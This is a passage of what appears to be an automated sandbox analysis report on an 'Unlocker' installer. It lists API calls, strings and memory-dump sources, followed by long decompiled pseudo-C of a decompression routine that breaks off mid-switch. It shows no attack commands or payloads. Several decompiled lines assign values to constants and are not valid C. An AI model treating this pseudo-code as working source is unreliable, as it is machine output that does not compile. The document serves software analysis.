                                                                                                                                                              0x00402116
                                                                                                                                                              0x00402126
                                                                                                                                                              0x00402135
                                                                                                                                                              0x00402137
                                                                                                                                                              0x00402143
                                                                                                                                                              0x00402143
                                                                                                                                                              0x00402135
                                                                                                                                                              0x00402145
                                                                                                                                                              0x0040214b
                                                                                                                                                              0x0040214b
                                                                                                                                                              0x0040214e
                                                                                                                                                              0x00402154
                                                                                                                                                              0x00402159
                                                                                                                                                              0x0040216e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00402159
                                                                                                                                                              0x00402164
                                                                                                                                                              0x0040288e
                                                                                                                                                              0x0040289a

                                                                                                                                                              APIs
                                                                                                                                                              • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402073
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040212D
                                                                                                                                                              Strings
                                                                                                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk, xrefs: 00402116, 00402120, 0040213C
                                                                                                                                                              • C:\Program Files\Unlocker, xrefs: 004020AB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.373612481.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.373605914.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373620814.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373626744.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                              • Associated: 00000000.00000002.373664597.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Unlocker1.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                              • String ID: C:\Program Files\Unlocker$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker\Uninstall.lnk
                                                                                                                                                              • API String ID: 123533781-2677551611
                                                                                                                                                              • Opcode ID: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                                                              • Instruction ID: ce0b4858a9f81ea3ddc308d80d774a06bef6b406c5dcff46aa6a4b0d76e862c7
                                                                                                                                                              • Opcode Fuzzy Hash: 71453fb45c89770e4f5e9780d50359adef83bdbe6145f3bfd3e7a5e9e412efc0
                                                                                                                                                              • Instruction Fuzzy Hash: AE418E75A00205BFCB40DFA4CD88E9E7BBABF48354B204269FA15FB2D1CA799D41CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                              			E00405FA8() {
                                                                                                                                                              				unsigned short _t531;
                                                                                                                                                              				signed int _t532;
                                                                                                                                                              				void _t533;
                                                                                                                                                              				void* _t534;
                                                                                                                                                              				signed int _t535;
                                                                                                                                                              				signed int _t565;
                                                                                                                                                              				signed int _t568;
                                                                                                                                                              				signed int _t590;
                                                                                                                                                              				signed int* _t607;
                                                                                                                                                              				void* _t614;
                                                                                                                                                              
                                                                                                                                                              				L0:
                                                                                                                                                              				while(1) {
                                                                                                                                                              					L0:
                                                                                                                                                              					if( *(_t614 - 0x40) != 0) {
                                                                                                                                                              						 *(_t614 - 0x34) = 1;
                                                                                                                                                              						 *(_t614 - 0x84) = 7;
                                                                                                                                                              						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                                                                                                                                                              						L132:
                                                                                                                                                              						 *(_t614 - 0x54) = _t607;
                                                                                                                                                              						L133:
                                                                                                                                                              						_t531 =  *_t607;
                                                                                                                                                              						_t590 = _t531 & 0x0000ffff;
                                                                                                                                                              						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                                                                                                                                                              						if( *(_t614 - 0xc) >= _t565) {
                                                                                                                                                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                                                                                                                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                                                                                                                                                              							 *(_t614 - 0x40) = 1;
                                                                                                                                                              							_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                              							 *_t607 = _t532;
                                                                                                                                                              						} else {
                                                                                                                                                              							 *(_t614 - 0x10) = _t565;
                                                                                                                                                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                              							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                                                                                                                                                              						}
                                                                                                                                                              						if( *(_t614 - 0x10) >= 0x1000000) {
                                                                                                                                                              							L139:
                                                                                                                                                              							_t533 =  *(_t614 - 0x84);
                                                                                                                                                              							L140:
                                                                                                                                                              							 *(_t614 - 0x88) = _t533;
                                                                                                                                                              							goto L1;
                                                                                                                                                              						} else {
                                                                                                                                                              							L137:
                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t614 - 0x88) = 5;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                              							goto L139;
                                                                                                                                                              						}
                                                                                                                                                              					} else {
                                                                                                                                                              						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                                                              						__esi =  *(__ebp - 0x60);
                                                                                                                                                              						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                                                              						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                                                              						__ecx =  *(__ebp - 0x3c);
                                                                                                                                                              						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                                                              						__ecx =  *(__ebp - 4);
                                                                                                                                                              						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                                                              						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                                                              						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                                                              						if( *(__ebp - 0x38) >= 4) {
                                                                                                                                                              							if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                                                              								_t97 = __ebp - 0x38;
                                                                                                                                                              								 *_t97 =  *(__ebp - 0x38) - 6;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							 *(__ebp - 0x38) = 0;
                                                                                                                                                              						}
                                                                                                                                                              						if( *(__ebp - 0x34) == __edx) {
                                                                                                                                                              							__ebx = 0;
                                                                                                                                                              							__ebx = 1;
                                                                                                                                                              							L60:
                                                                                                                                                              							__eax =  *(__ebp - 0x58);
                                                                                                                                                              							__edx = __ebx + __ebx;
                                                                                                                                                              							__ecx =  *(__ebp - 0x10);
                                                                                                                                                              							__esi = __edx + __eax;
                                                                                                                                                              							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                              							__edi = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								_t216 = __edx + 1; // 0x1
                                                                                                                                                              								__ebx = _t216;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edi;
                                                                                                                                                              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              								L59:
                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                              									goto L54;
                                                                                                                                                              								}
                                                                                                                                                              								goto L60;
                                                                                                                                                              							} else {
                                                                                                                                                              								L57:
                                                                                                                                                              								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              									 *(__ebp - 0x88) = 0xf;
                                                                                                                                                              									goto L170;
                                                                                                                                                              								}
                                                                                                                                                              								__ecx =  *(__ebp - 0x70);
                                                                                                                                                              								__eax =  *(__ebp - 0xc);
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              								_t202 = __ebp - 0x70;
                                                                                                                                                              								 *_t202 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              								goto L59;
                                                                                                                                                              							}
                                                                                                                                                              						} else {
                                                                                                                                                              							__eax =  *(__ebp - 0x14);
                                                                                                                                                              							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                              							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                              								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                              							}
                                                                                                                                                              							__ecx =  *(__ebp - 8);
                                                                                                                                                              							__ebx = 0;
                                                                                                                                                              							__ebx = 1;
                                                                                                                                                              							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                                                              							L40:
                                                                                                                                                              							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                                                              							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                                                              							__ecx =  *(__ebp - 0x58);
                                                                                                                                                              							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                                                              							 *(__ebp - 0x48) = __eax;
                                                                                                                                                              							__eax = __eax + 1;
                                                                                                                                                              							__eax = __eax << 8;
                                                                                                                                                              							__eax = __eax + __ebx;
                                                                                                                                                              							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                                                              							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              							__ax =  *__esi;
                                                                                                                                                              							 *(__ebp - 0x54) = __esi;
                                                                                                                                                              							__edx = __ax & 0x0000ffff;
                                                                                                                                                              							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                                                              							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              								__cx = __ax;
                                                                                                                                                              								 *(__ebp - 0x40) = 1;
                                                                                                                                                              								__cx = __ax >> 5;
                                                                                                                                                              								__ebx = __ebx + __ebx + 1;
                                                                                                                                                              								 *__esi = __ax;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                                                              								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              								0x800 = 0x800 - __edx;
                                                                                                                                                              								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                                                              								__ebx = __ebx + __ebx;
                                                                                                                                                              								 *__esi = __cx;
                                                                                                                                                              							}
                                                                                                                                                              							 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                              								L38:
                                                                                                                                                              								__eax =  *(__ebp - 0x40);
                                                                                                                                                              								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                                                              									while(1) {
                                                                                                                                                              										if(__ebx >= 0x100) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										__eax =  *(__ebp - 0x58);
                                                                                                                                                              										__edx = __ebx + __ebx;
                                                                                                                                                              										__ecx =  *(__ebp - 0x10);
                                                                                                                                                              										__esi = __edx + __eax;
                                                                                                                                                              										__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                              										__ax =  *__esi;
                                                                                                                                                              										 *(__ebp - 0x54) = __esi;
                                                                                                                                                              										__edi = __ax & 0x0000ffff;
                                                                                                                                                              										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                              										if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                              											__cx = __ax;
                                                                                                                                                              											_t169 = __edx + 1; // 0x1
                                                                                                                                                              											__ebx = _t169;
                                                                                                                                                              											__cx = __ax >> 5;
                                                                                                                                                              											 *__esi = __ax;
                                                                                                                                                              										} else {
                                                                                                                                                              											 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              											0x800 = 0x800 - __edi;
                                                                                                                                                              											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                              											__ebx = __ebx + __ebx;
                                                                                                                                                              											 *__esi = __cx;
                                                                                                                                                              										}
                                                                                                                                                              										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                              										if( *(__ebp - 0x10) < 0x1000000) {
                                                                                                                                                              											L45:
                                                                                                                                                              											if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              												 *(__ebp - 0x88) = 0xe;
                                                                                                                                                              												goto L170;
                                                                                                                                                              											}
                                                                                                                                                              											__ecx =  *(__ebp - 0x70);
                                                                                                                                                              											__eax =  *(__ebp - 0xc);
                                                                                                                                                              											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              											_t155 = __ebp - 0x70;
                                                                                                                                                              											 *_t155 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              									L53:
                                                                                                                                                              									_t172 = __ebp - 0x34;
                                                                                                                                                              									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              									L54:
                                                                                                                                                              									__al =  *(__ebp - 0x44);
                                                                                                                                                              									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                                                              									L55:
                                                                                                                                                              									if( *(__ebp - 0x64) == 0) {
                                                                                                                                                              										 *(__ebp - 0x88) = 0x1a;
                                                                                                                                                              										goto L170;
                                                                                                                                                              									}
                                                                                                                                                              									__ecx =  *(__ebp - 0x68);
                                                                                                                                                              									__al =  *(__ebp - 0x5c);
                                                                                                                                                              									__edx =  *(__ebp - 8);
                                                                                                                                                              									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                              									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                              									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                              									 *( *(__ebp - 0x68)) = __al;
                                                                                                                                                              									__ecx =  *(__ebp - 0x14);
                                                                                                                                                              									 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                                                              									__eax = __ecx + 1;
                                                                                                                                                              									__edx = 0;
                                                                                                                                                              									_t191 = __eax %  *(__ebp - 0x74);
                                                                                                                                                              									__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                              									__edx = _t191;
                                                                                                                                                              									L79:
                                                                                                                                                              									 *(__ebp - 0x14) = __edx;
                                                                                                                                                              									L80:
                                                                                                                                                              									 *(__ebp - 0x88) = 2;
                                                                                                                                                              									goto L1;
                                                                                                                                                              								}
                                                                                                                                                              								if(__ebx >= 0x100) {
                                                                                                                                                              									goto L53;
                                                                                                                                                              								}
                                                                                                                                                              								goto L40;
                                                                                                                                                              							} else {
                                                                                                                                                              								L36:
                                                                                                                                                              								if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                              									 *(__ebp - 0x88) = 0xd;
                                                                                                                                                              									L170:
                                                                                                                                                              									_t568 = 0x22;
                                                                                                                                                              									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                                                                                                                                                              									_t535 = 0;
                                                                                                                                                              									L172:
                                                                                                                                                              									return _t535;
                                                                                                                                                              								}
                                                                                                                                                              								__ecx =  *(__ebp - 0x70);
                                                                                                                                                              								__eax =  *(__ebp - 0xc);
                                                                                                                                                              								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                              								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                              								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              								_t121 = __ebp - 0x70;
                                                                                                                                                              								 *_t121 =  *(__ebp - 0x70) + 1;
                                                                                                                                                              								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                              								goto L38;
                                                                                                                                                              							}
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					L1:
                                                                                                                                                              					_t534 =  *(_t614 - 0x88);
                                                                                                                                                              					if(_t534 > 0x1c) {
                                                                                                                                                              						L171:
                                                                                                                                                              						_t535 = _t534 | 0xffffffff;
                                                                                                                                                              						goto L172;
                                                                                                                                                              					}
                                                                                                                                                              					switch( *((intOrPtr*)(_t534 * 4 +  &M0040684B))) {
                                                                                                                                                              						case 0:
                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                              							_t534 =  *( *(_t614 - 0x70));
                                                                                                                                                              							if(_t534 > 0xe1) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							}
                                                                                                                                                              							_t538 = _t534 & 0x000000ff;
                                                                                                                                                              							_push(0x2d);
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_pop(_t570);
                                                                                                                                                              							_push(9);
                                                                                                                                                              							_pop(_t571);
                                                                                                                                                              							_t610 = _t538 / _t570;
                                                                                                                                                              							_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t605 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                              							 *(_t614 - 0x3c) = _t605;
                                                                                                                                                              							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                                                                                                                                                              							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                              							_t613 = (0x300 << _t605 + _t610) + 0x736;
                                                                                                                                                              							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                                                                                                                                                              								L10:
                                                                                                                                                              								if(_t613 == 0) {
                                                                                                                                                              									L12:
                                                                                                                                                              									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                                                                                                                                                              									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                                                                                                                                                              									goto L15;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L11;
                                                                                                                                                              								}
                                                                                                                                                              								do {
                                                                                                                                                              									L11:
                                                                                                                                                              									_t613 = _t613 - 1;
                                                                                                                                                              									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                                                                                                                                                              								} while (_t613 != 0);
                                                                                                                                                              								goto L12;
                                                                                                                                                              							}
                                                                                                                                                              							if( *(_t614 - 4) != 0) {
                                                                                                                                                              								GlobalFree( *(_t614 - 4)); // executed
                                                                                                                                                              							}
                                                                                                                                                              							_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                              							 *(_t614 - 4) = _t534;
                                                                                                                                                              							if(_t534 == 0) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							} else {
                                                                                                                                                              								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                                                                                                                                                              								goto L10;
                                                                                                                                                              							}
                                                                                                                                                              						case 1:
                                                                                                                                                              							L13:
                                                                                                                                                              							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t614 - 0x88) = 1;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                              							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                                                                                                                                                              							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                              							_t45 = _t614 - 0x48;
                                                                                                                                                              							 *_t45 =  *(_t614 - 0x48) + 1;
                                                                                                                                                              							__eflags =  *_t45;
                                                                                                                                                              							L15:
                                                                                                                                                              							if( *(_t614 - 0x48) < 4) {
                                                                                                                                                              								goto L13;
                                                                                                                                                              							}
                                                                                                                                                              							_t546 =  *(_t614 - 0x40);
                                                                                                                                                              							if(_t546 ==  *(_t614 - 0x74)) {
                                                                                                                                                              								L20:
                                                                                                                                                              								 *(_t614 - 0x48) = 5;
                                                                                                                                                              								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                                                                                                                                                              								goto L23;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t614 - 0x74) = _t546;
                                                                                                                                                              							if( *(_t614 - 8) != 0) {
                                                                                                                                                              								GlobalFree( *(_t614 - 8)); // executed
                                                                                                                                                              							}
                                                                                                                                                              							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                                                                                                                                                              							 *(_t614 - 8) = _t534;
                                                                                                                                                              							if(_t534 == 0) {
                                                                                                                                                              								goto L171;
                                                                                                                                                              							} else {
                                                                                                                                                              								goto L20;
                                                                                                                                                              							}
                                                                                                                                                              						case 2:
                                                                                                                                                              							L24:
                                                                                                                                                              							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                                                                                                                                                              							 *(_t614 - 0x84) = 6;
                                                                                                                                                              							 *(_t614 - 0x4c) = _t553;
                                                                                                                                                              							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 3:
                                                                                                                                                              							L21:
                                                                                                                                                              							__eflags =  *(_t614 - 0x6c);
                                                                                                                                                              							if( *(_t614 - 0x6c) == 0) {
                                                                                                                                                              								 *(_t614 - 0x88) = 3;
                                                                                                                                                              								goto L170;
                                                                                                                                                              							}
                                                                                                                                                              							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                                                                                                                                                              							_t67 = _t614 - 0x70;
                                                                                                                                                              							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                                                                                                                                                              							__eflags =  *_t67;
                                                                                                                                                              							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                                                                                                                                                              							L23:
                                                                                                                                                              							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                                                                                                                                                              							if( *(_t614 - 0x48) != 0) {
                                                                                                                                                              								goto L21;
                                                                                                                                                              							}
                                                                                                                                                              							goto L24;
                                                                                                                                                              						case 4:
                                                                                                                                                              							goto L133;
                                                                                                                                                              						case 5:
                                                                                                                                                              							goto L137;
                                                                                                                                                              						case 6:
                                                                                                                                                              							goto L0;
                                                                                                                                                              						case 7:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                                                              							if( *(__ebp - 0x40) != 1) {
                                                                                                                                                              								__eax =  *(__ebp - 0x24);
                                                                                                                                                              								 *(__ebp - 0x80) = 0x16;
                                                                                                                                                              								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                              								__eax =  *(__ebp - 0x28);
                                                                                                                                                              								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                              								__eax =  *(__ebp - 0x2c);
                                                                                                                                                              								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                              								__eax = 0;
                                                                                                                                                              								__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                              								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                              								__al = __al & 0x000000fd;
                                                                                                                                                              								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__eax =  *(__ebp - 4) + 0x664;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								 *(__ebp - 0x58) = __eax;
                                                                                                                                                              								goto L68;
                                                                                                                                                              							}
                                                                                                                                                              							__eax =  *(__ebp - 4);
                                                                                                                                                              							__ecx =  *(__ebp - 0x38);
                                                                                                                                                              							 *(__ebp - 0x84) = 8;
                                                                                                                                                              							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 8:
                                                                                                                                                              							__eflags =  *(__ebp - 0x40);
                                                                                                                                                              							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                              								__eax =  *(__ebp - 4);
                                                                                                                                                              								__ecx =  *(__ebp - 0x38);
                                                                                                                                                              								 *(__ebp - 0x84) = 0xa;
                                                                                                                                                              								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                                                              							} else {
                                                                                                                                                              								__eax =  *(__ebp - 0x38);
                                                                                                                                                              								__ecx =  *(__ebp - 4);
                                                                                                                                                              								__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                                                              								 *(__ebp - 0x84) = 9;
                                                                                                                                                              								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                              								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                                                              							}
                                                                                                                                                              							goto L132;
                                                                                                                                                              						case 9:
